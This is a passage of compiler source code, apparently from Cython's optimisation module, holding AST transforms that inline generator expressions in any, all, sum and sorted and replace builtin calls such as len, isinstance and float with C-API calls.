if node.expr in self.yield_nodes:
self.yield_stat_nodes[node.expr] = node
def __visit_GeneratorExpressionNode(self, node):
# enable when we support generic generator expressions
#
# everything below this node is out of scope
pass
def _find_single_yield_expression(self, node):
collector = self.YieldNodeCollector()
collector.visitchildren(node)
if len(collector.yield_nodes) != 1:
return None, None
yield_node = collector.yield_nodes[0]
try:
return (yield_node.arg, collector.yield_stat_nodes[yield_node])
except KeyError:
return None, None
def _handle_simple_function_all(self, node, pos_args):
"""Transform
_result = all(x for L in LL for x in L)
into
for L in LL:
for x in L:
if not x:
_result = False
break
else:
continue
break
else:
_result = True
"""
return self._transform_any_all(node, pos_args, False)
def _handle_simple_function_any(self, node, pos_args):
"""Transform
_result = any(x for L in LL for x in L)
into
for L in LL:
for x in L:
if x:
_result = True
break
else:
continue
break
else:
_result = False
"""
return self._transform_any_all(node, pos_args, True)
def _transform_any_all(self, node, pos_args, is_any):
if len(pos_args) != 1:
return node
if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
if is_any:
condition = yield_expression
else:
condition = ExprNodes.NotNode(yield_expression.pos, operand = yield_expression)
result_ref = UtilNodes.ResultRefNode(pos=node.pos, type=PyrexTypes.c_bint_type)
test_node = Nodes.IfStatNode(
yield_expression.pos,
else_clause = None,
if_clauses = [ Nodes.IfClauseNode(
yield_expression.pos,
condition = condition,
body = Nodes.StatListNode(
node.pos,
stats = [
Nodes.SingleAssignmentNode(
node.pos,
lhs = result_ref,
rhs = ExprNodes.BoolNode(yield_expression.pos, value = is_any,
constant_result = is_any)),
Nodes.BreakStatNode(node.pos)
])) ]
)
loop = loop_node
while isinstance(loop.body, Nodes.LoopNode):
next_loop = loop.body
loop.body = Nodes.StatListNode(loop.body.pos, stats = [
loop.body,
Nodes.BreakStatNode(yield_expression.pos)
])
next_loop.else_clause = Nodes.ContinueStatNode(yield_expression.pos)
loop = next_loop
loop_node.else_clause = Nodes.SingleAssignmentNode(
node.pos,
lhs = result_ref,
rhs = ExprNodes.BoolNode(yield_expression.pos, value = not is_any,
constant_result = not is_any))
Visitor.recursively_replace_node(loop_node, yield_stat_node, test_node)
return ExprNodes.InlinedGeneratorExpressionNode(
gen_expr_node.pos, loop = loop_node, result_node = result_ref,
expr_scope = gen_expr_node.expr_scope, orig_func = is_any and 'any' or 'all')
def _handle_simple_function_sorted(self, node, pos_args):
"""Transform sorted(genexpr) and sorted([listcomp]) into
[listcomp].sort(). CPython just reads the iterable into a
list and calls .sort() on it. Expanding the iterable in a
listcomp is still faster and the result can be sorted in
place.
"""
if len(pos_args) != 1:
return node
if isinstance(pos_args[0], ExprNodes.ComprehensionNode) \
and pos_args[0].type is Builtin.list_type:
listcomp_node = pos_args[0]
loop_node = listcomp_node.loop
elif isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
append_node = ExprNodes.ComprehensionAppendNode(
yield_expression.pos, expr = yield_expression)
Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)
listcomp_node = ExprNodes.ComprehensionNode(
gen_expr_node.pos, loop = loop_node,
append = append_node, type = Builtin.list_type,
expr_scope = gen_expr_node.expr_scope,
has_local_scope = True)
append_node.target = listcomp_node
else:
return node
result_node = UtilNodes.ResultRefNode(
pos = loop_node.pos, type = Builtin.list_type, may_hold_none=False)
listcomp_assign_node = Nodes.SingleAssignmentNode(
node.pos, lhs = result_node, rhs = listcomp_node, first = True)
sort_method = ExprNodes.AttributeNode(
node.pos, obj = result_node, attribute = EncodedString('sort'),
# entry ? type ?
needs_none_check = False)
sort_node = Nodes.ExprStatNode(
node.pos, expr = ExprNodes.SimpleCallNode(
node.pos, function = sort_method, args = []))
sort_node.analyse_declarations(self.current_env())
return UtilNodes.TempResultFromStatNode(
result_node,
Nodes.StatListNode(node.pos, stats = [ listcomp_assign_node, sort_node ]))
def _handle_simple_function_sum(self, node, pos_args):
"""Transform sum(genexpr) into an equivalent inlined aggregation loop.
"""
if len(pos_args) not in (1,2):
return node
if not isinstance(pos_args[0], (ExprNodes.GeneratorExpressionNode,
ExprNodes.ComprehensionNode)):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
if isinstance(gen_expr_node, ExprNodes.GeneratorExpressionNode):
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
else: # ComprehensionNode
yield_stat_node = gen_expr_node.append
yield_expression = yield_stat_node.expr
try:
if not yield_expression.is_literal or not yield_expression.type.is_int:
return node
except AttributeError:
return node # in case we don't have a type yet
# special case: old Py2 backwards compatible "sum([int_const for ...])"
# can safely be unpacked into a genexpr
if len(pos_args) == 1:
start = ExprNodes.IntNode(node.pos, value='0', constant_result=0)
else:
start = pos_args[1]
result_ref = UtilNodes.ResultRefNode(pos=node.pos, type=PyrexTypes.py_object_type)
add_node = Nodes.SingleAssignmentNode(
yield_expression.pos,
lhs = result_ref,
rhs = ExprNodes.binop_node(node.pos, '+', result_ref, yield_expression)
)
Visitor.recursively_replace_node(loop_node, yield_stat_node, add_node)
exec_code = Nodes.StatListNode(
node.pos,
stats = [
Nodes.SingleAssignmentNode(
start.pos,
lhs = UtilNodes.ResultRefNode(pos=node.pos, expression=result_ref),
rhs = start,
first = True),
loop_node
])
return ExprNodes.InlinedGeneratorExpressionNode(
gen_expr_node.pos, loop = exec_code, result_node = result_ref,
expr_scope = gen_expr_node.expr_scope, orig_func = 'sum',
has_local_scope = gen_expr_node.has_local_scope)
def _handle_simple_function_min(self, node, pos_args):
return self._optimise_min_max(node, pos_args, '<')
def _handle_simple_function_max(self, node, pos_args):
return self._optimise_min_max(node, pos_args, '>')
def _optimise_min_max(self, node, args, operator):
"""Replace min(a,b,...) and max(a,b,...) by explicit comparison code.
"""
if len(args) <= 1:
if len(args) == 1 and args[0].is_sequence_constructor:
args = args[0].args
else:
# leave this to Python
return node
cascaded_nodes = list(map(UtilNodes.ResultRefNode, args[1:]))
last_result = args[0]
for arg_node in cascaded_nodes:
result_ref = UtilNodes.ResultRefNode(last_result)
last_result = ExprNodes.CondExprNode(
arg_node.pos,
true_val = arg_node,
false_val = result_ref,
test = ExprNodes.PrimaryCmpNode(
arg_node.pos,
operand1 = arg_node,
operator = operator,
operand2 = result_ref,
)
)
last_result = UtilNodes.EvalWithTempExprNode(result_ref, last_result)
for ref_node in cascaded_nodes[::-1]:
last_result = UtilNodes.EvalWithTempExprNode(ref_node, last_result)
return last_result
def _DISABLED_handle_simple_function_tuple(self, node, pos_args):
if not pos_args:
return ExprNodes.TupleNode(node.pos, args=[], constant_result=())
# This is a bit special - for iterables (including genexps),
# Python actually overallocates and resizes a newly created
# tuple incrementally while reading items, which we can't
# easily do without explicit node support. Instead, we read
# the items into a list and then copy them into a tuple of the
# final size. This takes up to twice as much memory, but will
# have to do until we have real support for genexps.
result = self._transform_list_set_genexpr(node, pos_args, Builtin.list_type)
if result is not node:
return ExprNodes.AsTupleNode(node.pos, arg=result)
return node
def _handle_simple_function_frozenset(self, node, pos_args):
"""Replace frozenset([...]) by frozenset((...)) as tuples are more efficient.
"""
if len(pos_args) != 1:
return node
if pos_args[0].is_sequence_constructor and not pos_args[0].args:
del pos_args[0]
elif isinstance(pos_args[0], ExprNodes.ListNode):
pos_args[0] = pos_args[0].as_tuple()
return node
def _handle_simple_function_list(self, node, pos_args):
if not pos_args:
return ExprNodes.ListNode(node.pos, args=[], constant_result=[])
return self._transform_list_set_genexpr(node, pos_args, Builtin.list_type)
def _handle_simple_function_set(self, node, pos_args):
if not pos_args:
return ExprNodes.SetNode(node.pos, args=[], constant_result=set())
return self._transform_list_set_genexpr(node, pos_args, Builtin.set_type)
def _transform_list_set_genexpr(self, node, pos_args, target_type):
"""Replace set(genexpr) and list(genexpr) by a literal comprehension.
"""
if len(pos_args) > 1:
return node
if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
append_node = ExprNodes.ComprehensionAppendNode(
yield_expression.pos,
expr = yield_expression)
Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)
comp = ExprNodes.ComprehensionNode(
node.pos,
has_local_scope = True,
expr_scope = gen_expr_node.expr_scope,
loop = loop_node,
append = append_node,
type = target_type)
append_node.target = comp
return comp
def _handle_simple_function_dict(self, node, pos_args):
"""Replace dict( (a,b) for ... ) by a literal { a:b for ... }.
"""
if len(pos_args) == 0:
return ExprNodes.DictNode(node.pos, key_value_pairs=[], constant_result={})
if len(pos_args) > 1:
return node
if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
if not isinstance(yield_expression, ExprNodes.TupleNode):
return node
if len(yield_expression.args) != 2:
return node
append_node = ExprNodes.DictComprehensionAppendNode(
yield_expression.pos,
key_expr = yield_expression.args[0],
value_expr = yield_expression.args[1])
Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)
dictcomp = ExprNodes.ComprehensionNode(
node.pos,
has_local_scope = True,
expr_scope = gen_expr_node.expr_scope,
loop = loop_node,
append = append_node,
type = Builtin.dict_type)
append_node.target = dictcomp
return dictcomp
# specific handlers for general call nodes
def _handle_general_function_dict(self, node, pos_args, kwargs):
"""Replace dict(a=b,c=d,...) by the underlying keyword dict
construction which is done anyway.
"""
if len(pos_args) > 0:
return node
if not isinstance(kwargs, ExprNodes.DictNode):
return node
return kwargs
class InlineDefNodeCalls(Visitor.NodeRefCleanupMixin, Visitor.EnvTransform):
visit_Node = Visitor.VisitorTransform.recurse_to_children
def get_constant_value_node(self, name_node):
if name_node.cf_state is None:
return None
if name_node.cf_state.cf_is_null:
return None
entry = self.current_env().lookup(name_node.name)
if not entry or (not entry.cf_assignments
or len(entry.cf_assignments) != 1):
# not just a single assignment in all closures
return None
return entry.cf_assignments[0].rhs
def visit_SimpleCallNode(self, node):
self.visitchildren(node)
if not self.current_directives.get('optimize.inline_defnode_calls'):
return node
function_name = node.function
if not function_name.is_name:
return node
function = self.get_constant_value_node(function_name)
if not isinstance(function, ExprNodes.PyCFunctionNode):
return node
inlined = ExprNodes.InlinedDefNodeCallNode(
node.pos, function_name=function_name,
function=function, args=node.args)
if inlined.can_be_inlined():
return self.replace(node, inlined)
return node
class OptimizeBuiltinCalls(Visitor.MethodDispatcherTransform):
"""Optimize some common methods calls and instantiation patterns
for builtin types *after* the type analysis phase.
Running after type analysis, this transform can only perform
function replacements that do not alter the function return type
in a way that was not anticipated by the type analysis.
"""
### cleanup to avoid redundant coercions to/from Python types
def _visit_PyTypeTestNode(self, node):
# disabled - appears to break assignments in some cases, and
# also drops a None check, which might still be required
"""Flatten redundant type checks after tree changes.
"""
old_arg = node.arg
self.visitchildren(node)
if old_arg is node.arg or node.arg.type != node.type:
return node
return node.arg
def _visit_TypecastNode(self, node):
# disabled - the user may have had a reason to put a type
# cast, even if it looks redundant to Cython
"""
Drop redundant type casts.
"""
self.visitchildren(node)
if node.type == node.operand.type:
return node.operand
return node
def visit_ExprStatNode(self, node):
"""
Drop useless coercions.
"""
self.visitchildren(node)
if isinstance(node.expr, ExprNodes.CoerceToPyTypeNode):
node.expr = node.expr.arg
return node
def visit_CoerceToBooleanNode(self, node):
"""Drop redundant conversion nodes after tree changes.
"""
self.visitchildren(node)
arg = node.arg
if isinstance(arg, ExprNodes.PyTypeTestNode):
arg = arg.arg
if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
if arg.type in (PyrexTypes.py_object_type, Builtin.bool_type):
return arg.arg.coerce_to_boolean(self.current_env())
return node
def visit_CoerceFromPyTypeNode(self, node):
"""Drop redundant conversion nodes after tree changes.
Also, optimise away calls to Python's builtin int() and
float() if the result is going to be coerced back into a C
type anyway.
"""
self.visitchildren(node)
arg = node.arg
if not arg.type.is_pyobject:
# no Python conversion left at all, just do a C coercion instead
if node.type == arg.type:
return arg
else:
return arg.coerce_to(node.type, self.current_env())
if isinstance(arg, ExprNodes.PyTypeTestNode):
arg = arg.arg
if arg.is_literal:
if (node.type.is_int and isinstance(arg, ExprNodes.IntNode) or
node.type.is_float and isinstance(arg, ExprNodes.FloatNode) or
node.type.is_int and isinstance(arg, ExprNodes.BoolNode)):
return arg.coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.CoerceToPyTypeNode):
if arg.type is PyrexTypes.py_object_type:
if node.type.assignable_from(arg.arg.type):
# completely redundant C->Py->C coercion
return arg.arg.coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.SimpleCallNode):
if node.type.is_int or node.type.is_float:
return self._optimise_numeric_cast_call(node, arg)
elif isinstance(arg, ExprNodes.IndexNode) and not arg.is_buffer_access:
index_node = arg.index
if isinstance(index_node, ExprNodes.CoerceToPyTypeNode):
index_node = index_node.arg
if index_node.type.is_int:
return self._optimise_int_indexing(node, arg, index_node)
return node
PyBytes_GetItemInt_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_char_type, [
PyrexTypes.CFuncTypeArg("bytes", Builtin.bytes_type, None),
PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("check_bounds", PyrexTypes.c_int_type, None),
],
exception_value = "((char)-1)",
exception_check = True)
def _optimise_int_indexing(self, coerce_node, arg, index_node):
env = self.current_env()
bound_check_bool = env.directives['boundscheck'] and 1 or 0
if arg.base.type is Builtin.bytes_type:
if coerce_node.type in (PyrexTypes.c_char_type, PyrexTypes.c_uchar_type):
# bytes[index] -> char
bound_check_node = ExprNodes.IntNode(
coerce_node.pos, value=str(bound_check_bool),
constant_result=bound_check_bool)
node = ExprNodes.PythonCapiCallNode(
coerce_node.pos, "__Pyx_PyBytes_GetItemInt",
self.PyBytes_GetItemInt_func_type,
args=[
arg.base.as_none_safe_node("'NoneType' object is not subscriptable"),
index_node.coerce_to(PyrexTypes.c_py_ssize_t_type, env),
bound_check_node,
],
is_temp=True,
utility_code=UtilityCode.load_cached(
'bytes_index', 'StringTools.c'))
if coerce_node.type is not PyrexTypes.c_char_type:
node = node.coerce_to(coerce_node.type, env)
return node
return coerce_node
def _optimise_numeric_cast_call(self, node, arg):
function = arg.function
if not isinstance(function, ExprNodes.NameNode) \
or not function.type.is_builtin_type \
or not isinstance(arg.arg_tuple, ExprNodes.TupleNode):
return node
args = arg.arg_tuple.args
if len(args) != 1:
return node
func_arg = args[0]
if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
func_arg = func_arg.arg
elif func_arg.type.is_pyobject:
# play safe: Python conversion might work on all sorts of things
return node
if function.name == 'int':
if func_arg.type.is_int or node.type.is_int:
if func_arg.type == node.type:
return func_arg
elif node.type.assignable_from(func_arg.type) or func_arg.type.is_float:
return ExprNodes.TypecastNode(
node.pos, operand=func_arg, type=node.type)
elif function.name == 'float':
if func_arg.type.is_float or node.type.is_float:
if func_arg.type == node.type:
return func_arg
elif node.type.assignable_from(func_arg.type) or func_arg.type.is_float:
return ExprNodes.TypecastNode(
node.pos, operand=func_arg, type=node.type)
return node
def _error_wrong_arg_count(self, function_name, node, args, expected=None):
if not expected: # None or 0
arg_str = ''
elif isinstance(expected, basestring) or expected > 1:
arg_str = '...'
elif expected == 1:
arg_str = 'x'
else:
arg_str = ''
if expected is not None:
expected_str = 'expected %s, ' % expected
else:
expected_str = ''
error(node.pos, "%s(%s) called with wrong number of args, %sfound %d" % (
function_name, arg_str, expected_str, len(args)))
### generic fallbacks
def _handle_function(self, node, function_name, function, arg_list, kwargs):
return node
def _handle_method(self, node, type_name, attr_name, function,
arg_list, is_unbound_method, kwargs):
"""
Try to inject C-API calls for unbound method calls to builtin types.
While the method declarations in Builtin.py already handle this, we
can additionally resolve bound and unbound methods here that were
assigned to variables ahead of time.
"""
if kwargs:
return node
if not function or not function.is_attribute or not function.obj.is_name:
# cannot track unbound method calls over more than one indirection as
# the names might have been reassigned in the meantime
return node
type_entry = self.current_env().lookup(type_name)
if not type_entry:
return node
method = ExprNodes.AttributeNode(
node.function.pos,
obj=ExprNodes.NameNode(
function.pos,
name=type_name,
entry=type_entry,
type=type_entry.type),
attribute=attr_name,
is_called=True).analyse_as_unbound_cmethod_node(self.current_env())
if method is None:
return node
args = node.args
if args is None and node.arg_tuple:
args = node.arg_tuple.args
call_node = ExprNodes.SimpleCallNode(
node.pos,
function=method,
args=args)
if not is_unbound_method:
call_node.self = function.obj
call_node.analyse_c_function_call(self.current_env())
call_node.analysed = True
return call_node.coerce_to(node.type, self.current_env())
### builtin types
PyDict_Copy_func_type = PyrexTypes.CFuncType(
Builtin.dict_type, [
PyrexTypes.CFuncTypeArg("dict", Builtin.dict_type, None)
])
def _handle_simple_function_dict(self, node, function, pos_args):
"""Replace dict(some_dict) by PyDict_Copy(some_dict).
"""
if len(pos_args) != 1:
return node
arg = pos_args[0]
if arg.type is Builtin.dict_type:
arg = arg.as_none_safe_node("'NoneType' is not iterable")
return ExprNodes.PythonCapiCallNode(
node.pos, "PyDict_Copy", self.PyDict_Copy_func_type,
args = [arg],
is_temp = node.is_temp
)
return node
PyList_AsTuple_func_type = PyrexTypes.CFuncType(
Builtin.tuple_type, [
PyrexTypes.CFuncTypeArg("list", Builtin.list_type, None)
])
def _handle_simple_function_tuple(self, node, function, pos_args):
"""Replace tuple([...]) by a call to PyList_AsTuple.
"""
if len(pos_args) != 1:
return node
arg = pos_args[0]
if arg.type is Builtin.tuple_type and not arg.may_be_none():
return arg
if arg.type is not Builtin.list_type:
return node
pos_args[0] = arg.as_none_safe_node(
"'NoneType' object is not iterable")
return ExprNodes.PythonCapiCallNode(
node.pos, "PyList_AsTuple", self.PyList_AsTuple_func_type,
args = pos_args,
is_temp = node.is_temp
)
PySet_New_func_type = PyrexTypes.CFuncType(
Builtin.set_type, [
PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_set(self, node, function, pos_args):
if len(pos_args) != 1:
return node
if pos_args[0].is_sequence_constructor:
# We can optimise set([x,y,z]) safely into a set literal,
# but only if we create all items before adding them -
# adding an item may raise an exception if it is not
# hashable, but creating the later items may have
# side-effects.
args = []
temps = []
for arg in pos_args[0].args:
if not arg.is_simple():
arg = UtilNodes.LetRefNode(arg)
temps.append(arg)
args.append(arg)
result = ExprNodes.SetNode(node.pos, is_temp=1, args=args)
for temp in temps[::-1]:
result = UtilNodes.EvalWithTempExprNode(temp, result)
return result
else:
# PySet_New(it) is better than a generic Python call to set(it)
return ExprNodes.PythonCapiCallNode(
node.pos, "PySet_New",
self.PySet_New_func_type,
args=pos_args,
is_temp=node.is_temp,
utility_code=UtilityCode.load_cached('pyset_compat', 'Builtins.c'),
py_name="set")
PyFrozenSet_New_func_type = PyrexTypes.CFuncType(
Builtin.frozenset_type, [
PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_frozenset(self, node, function, pos_args):
if not pos_args:
pos_args = [ExprNodes.NullNode(node.pos)]
elif len(pos_args) > 1:
return node
elif pos_args[0].type is Builtin.frozenset_type and not pos_args[0].may_be_none():
return pos_args[0]
# PyFrozenSet_New(it) is better than a generic Python call to frozenset(it)
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_PyFrozenSet_New",
self.PyFrozenSet_New_func_type,
args=pos_args,
is_temp=node.is_temp,
utility_code=UtilityCode.load_cached('pyfrozenset_new', 'Builtins.c'),
py_name="frozenset")
PyObject_AsDouble_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_double_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None),
],
exception_value = "((double)-1)",
exception_check = True)
def _handle_simple_function_float(self, node, function, pos_args):
"""Transform float() into either a C type cast or a faster C
function call.
"""
# Note: this requires the float() function to be typed as
# returning a C 'double'
if len(pos_args) == 0:
return ExprNodes.FloatNode(
node, value="0.0", constant_result=0.0
).coerce_to(Builtin.float_type, self.current_env())
elif len(pos_args) != 1:
self._error_wrong_arg_count('float', node, pos_args, '0 or 1')
return node
func_arg = pos_args[0]
if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
func_arg = func_arg.arg
if func_arg.type is PyrexTypes.c_double_type:
return func_arg
elif node.type.assignable_from(func_arg.type) or func_arg.type.is_numeric:
return ExprNodes.TypecastNode(
node.pos, operand=func_arg, type=node.type)
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_PyObject_AsDouble",
self.PyObject_AsDouble_func_type,
args = pos_args,
is_temp = node.is_temp,
utility_code = load_c_utility('pyobject_as_double'),
py_name = "float")
PyNumber_Int_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("o", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_int(self, node, function, pos_args):
"""Transform int() into a faster C function call.
"""
if len(pos_args) == 0:
return ExprNodes.IntNode(node, value="0", constant_result=0,
type=PyrexTypes.py_object_type)
elif len(pos_args) != 1:
return node # int(x, base)
func_arg = pos_args[0]
if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
return node # handled in visit_CoerceFromPyTypeNode()
if func_arg.type.is_pyobject and node.type.is_pyobject:
return ExprNodes.PythonCapiCallNode(
node.pos, "PyNumber_Int", self.PyNumber_Int_func_type,
args=pos_args, is_temp=True)
return node
def _handle_simple_function_bool(self, node, function, pos_args):
"""Transform bool(x) into a type coercion to a boolean.
"""
if len(pos_args) == 0:
return ExprNodes.BoolNode(
node.pos, value=False, constant_result=False
).coerce_to(Builtin.bool_type, self.current_env())
elif len(pos_args) != 1:
self._error_wrong_arg_count('bool', node, pos_args, '0 or 1')
return node
else:
# => !!<bint>(x) to make sure it's exactly 0 or 1
operand = pos_args[0].coerce_to_boolean(self.current_env())
operand = ExprNodes.NotNode(node.pos, operand = operand)
operand = ExprNodes.NotNode(node.pos, operand = operand)
# coerce back to Python object as that's the result we are expecting
return operand.coerce_to_pyobject(self.current_env())
### builtin functions
Pyx_strlen_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_size_t_type, [
PyrexTypes.CFuncTypeArg("bytes", PyrexTypes.c_char_ptr_type, None)
])
Pyx_Py_UNICODE_strlen_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_size_t_type, [
PyrexTypes.CFuncTypeArg("unicode", PyrexTypes.c_py_unicode_ptr_type, None)
])
PyObject_Size_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None)
],
exception_value="-1")
_map_to_capi_len_function = {
Builtin.unicode_type : "__Pyx_PyUnicode_GET_LENGTH",
Builtin.bytes_type : "PyBytes_GET_SIZE",
Builtin.list_type : "PyList_GET_SIZE",
Builtin.tuple_type : "PyTuple_GET_SIZE",
Builtin.dict_type : "PyDict_Size",
Builtin.set_type : "PySet_Size",
Builtin.frozenset_type : "PySet_Size",
}.get
_ext_types_with_pysize = set(["cpython.array.array"])
def _handle_simple_function_len(self, node, function, pos_args):
"""Replace len(char*) by the equivalent call to strlen(),
len(Py_UNICODE) by the equivalent Py_UNICODE_strlen() and
len(known_builtin_type) by an equivalent C-API call.
"""
if len(pos_args) != 1:
self._error_wrong_arg_count('len', node, pos_args, 1)
return node
arg = pos_args[0]
if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
arg = arg.arg
if arg.type.is_string:
new_node = ExprNodes.PythonCapiCallNode(
node.pos, "strlen", self.Pyx_strlen_func_type,
args = [arg],
is_temp = node.is_temp,
utility_code = UtilityCode.load_cached("IncludeStringH", "StringTools.c"))
elif arg.type.is_pyunicode_ptr:
new_node = ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_Py_UNICODE_strlen", self.Pyx_Py_UNICODE_strlen_func_type,
args = [arg],
is_temp = node.is_temp)
elif arg.type.is_pyobject:
cfunc_name = self._map_to_capi_len_function(arg.type)
if cfunc_name is None:
arg_type = arg.type
if ((arg_type.is_extension_type or arg_type.is_builtin_type)
and arg_type.entry.qualified_name in self._ext_types_with_pysize):
cfunc_name = 'Py_SIZE'
else:
return node
arg = arg.as_none_safe_node(
"object of type 'NoneType' has no len()")
new_node = ExprNodes.PythonCapiCallNode(
node.pos, cfunc_name, self.PyObject_Size_func_type,
args = [arg],
is_temp = node.is_temp)
elif arg.type.is_unicode_char:
return ExprNodes.IntNode(node.pos, value='1', constant_result=1,
type=node.type)
else:
return node
if node.type not in (PyrexTypes.c_size_t_type, PyrexTypes.c_py_ssize_t_type):
new_node = new_node.coerce_to(node.type, self.current_env())
return new_node
Pyx_Type_func_type = PyrexTypes.CFuncType(
Builtin.type_type, [
PyrexTypes.CFuncTypeArg("object", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_type(self, node, function, pos_args):
"""Replace type(o) by a macro call to Py_TYPE(o).
"""
if len(pos_args) != 1:
return node
node = ExprNodes.PythonCapiCallNode(
node.pos, "Py_TYPE", self.Pyx_Type_func_type,
args = pos_args,
is_temp = False)
return ExprNodes.CastNode(node, PyrexTypes.py_object_type)
Py_type_check_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_bint_type, [
PyrexTypes.CFuncTypeArg("arg", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_isinstance(self, node, function, pos_args):
"""Replace isinstance() checks against builtin types by the
corresponding C-API call.
"""
if len(pos_args) != 2:
return node
arg, types = pos_args
temp = None
if isinstance(types, ExprNodes.TupleNode):
types = types.args
if arg.is_attribute or not arg.is_simple():
arg = temp = UtilNodes.ResultRefNode(arg)
elif types.type is Builtin.type_type:
types = [types]
else:
return node
tests = []
test_nodes = []
env = self.current_env()
for test_type_node in types:
builtin_type = None
if test_type_node.is_name:
if test_type_node.entry:
entry = env.lookup(test_type_node.entry.name)
if entry and entry.type and entry.type.is_builtin_type:
builtin_type = entry.type
if builtin_type is Builtin.type_type:
# all types have type "type", but there's only one 'type'
if entry.name != 'type' or not (
entry.scope and entry.scope.is_builtin_scope):
builtin_type = None
if builtin_type is not None:
type_check_function = entry.type.type_check_function(exact=False)
if type_check_function in tests:
continue
tests.append(type_check_function)
type_check_args = [arg]
elif test_type_node.type is Builtin.type_type:
type_check_function = '__Pyx_TypeCheck'
type_check_args = [arg, test_type_node]
else:
return node
test_nodes.append(
ExprNodes.PythonCapiCallNode(
test_type_node.pos, type_check_function, self.Py_type_check_func_type,
args = type_check_args,
is_temp = True,
))
def join_with_or(a,b, make_binop_node=ExprNodes.binop_node):
or_node = make_binop_node(node.pos, 'or', a, b)
or_node.type = PyrexTypes.c_bint_type
or_node.is_temp = True
return or_node
test_node = reduce(join_with_or, test_nodes).coerce_to(node.type, env)
if temp is not None:
test_node = UtilNodes.EvalWithTempExprNode(temp, test_node)
return test_node
def _handle_simple_function_ord(self, node, function, pos_args):
"""Unpack ord(Py_UNICODE) and ord('X').
"""
if len(pos_args) != 1:
return node
arg = pos_args[0]
if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
if arg.arg.type.is_unicode_char:
return ExprNodes.TypecastNode(
arg.pos, operand=arg.arg, type=PyrexTypes.c_int_type
).coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.UnicodeNode):
if len(arg.value) == 1:
return ExprNodes.IntNode(
arg.pos, type=PyrexTypes.c_int_type,
value=str(ord(arg.value)),
constant_result=ord(arg.value)
).coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.StringNode):
if arg.unicode_value and len(arg.unicode_value) == 1 \
and ord(arg.unicode_value) <= 255: # Py2/3 portability
return ExprNodes.IntNode(
arg.pos, type=PyrexTypes.c_int_type,
value=str(ord(arg.unicode_value)),
constant_result=ord(arg.unicode_value)
).coerce_to(node.type, self.current_env())
return node
### special methods
Pyx_tp_new_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("type", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("args", Builtin.tuple_type, None),
])
Pyx_tp_new_kwargs_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("type", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("args", Builtin.tuple_type, None),
PyrexTypes.CFuncTypeArg("kwargs", Builtin.dict_type, None),
])
def _handle_any_slot__new__(self, node, function, args,
is_unbound_method, kwargs=None):
"""Replace 'exttype.__new__(exttype, ...)' by a call to exttype->tp_new()
"""
obj = function.obj
if not is_unbound_method or len(args) < 1:
return node
type_arg = args[0]
if not obj.is_name or not type_arg.is_name:
# play safe
return node
if obj.type != Builtin.type_type or type_arg.type != Builtin.type_type:
# not a known type, play safe
return node
if not type_arg.type_entry or not obj.type_entry:
if obj.name != type_arg.name:
return node
# otherwise, we know it's a type and we know it's the same
# type for both - that should do
elif type_arg.type_entry != obj.type_entry:
# different types - may or may not lead to an error at runtime
return node
args_tuple = ExprNodes.TupleNode(node.pos, args=args[1:])
args_tuple = args_tuple.analyse_types(
self.current_env(), skip_children=True)
if type_arg.type_entry:
ext_type = type_arg.type_entry.type
if (ext_type.is_extension_type and ext_type.typeobj_cname and
ext_type.scope.global_scope() == self.current_env().global_scope()):
# known type in current module
tp_slot = TypeSlots.ConstructorSlot("tp_new", '__new__')
slot_func_cname = TypeSlots.get_slot_function(ext_type.scope, tp_slot)
